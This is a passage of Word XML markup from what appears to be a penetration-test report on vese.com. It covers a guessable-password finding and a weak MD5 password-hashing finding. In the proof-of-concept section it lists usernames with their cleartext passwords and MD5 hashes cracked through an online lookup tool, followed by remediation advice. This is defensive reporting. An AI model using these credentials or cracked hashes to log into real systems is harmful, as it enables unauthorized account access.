                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55AF1F49" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A500EDC" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C56D182" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The following users have guessable passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B03BED" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>internal.vese.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F7A274" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eladministrador</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Password: windfarm123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F200E2F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nsanders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Password: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>helloitsme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3BCD1D4E" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vese.com </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EA1978" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ElAdministrador</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Password: windfarm123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDFEC29" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">In particular, the passwords for users of internal.vese.com are obtainable from the passwords’ MD5 hashes through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>well known</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tools such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://crackstation.net/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af8"/>
        <w:tblW w:w="8505" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1950"/>
        <w:gridCol w:w="4005"/>
        <w:gridCol w:w="1035"/>
        <w:gridCol w:w="1515"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="7D73849C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="470"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="32739306" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4005" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="16DC1484" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Password Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1035" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="140BBC6F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2148B5CF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="3986CE81" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="405"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950"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14:paraId="53B360A3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nsanders</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400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14:paraId="238F32BF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ef91307aae4da64fa55b90ae1fc1f3c5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="103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14:paraId="479A8195" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="151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14:paraId="0D6A13D0" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>helloitsme</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="32802CB1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="405"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950"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14:paraId="03AD10B2" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eladministrador</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400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14:paraId="21662A5F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0db613e31e5b53a238e35469d752ffa6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="103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14:paraId="677450B5" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="151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tcPr>
          <w:p w14:paraId="7449138E" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>windfarm123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A3F50BF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="6A09B668" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af9"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="4FADF7C8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="11A799E9" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Who:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65C84939" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>IT Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="440FB1DC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="600798F5" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Vector:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E83DF06" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="00B33445" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="2927261B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Action:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DEDA3D6" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Change weak passwords for administrative accounts and avoid using them again in the future.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75E8E147" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_heading=h.hxkl82e1f8jl" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02175310" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:hanging="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_heading=h.rvunxjig30ow" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Weak passwords hashing</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(Medium Severity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DA4BFA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="afa"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="769BA4F9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="78A19461" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69C646EB" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Passwords for the internal.vese.com panel are hashed through the MD5 obsolete </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>hashing  algorithm</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>. Consider switching to a more robust algorithm.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="025E8D98" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="4C14CB1C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Impact:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
          </w:tcPr>
          <w:p w14:paraId="54C0C551" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="1588681A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="006AB98B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="195CBB41" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Host: vese.com, internal.vese.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="743ABD26" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="2D0E7CB4" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
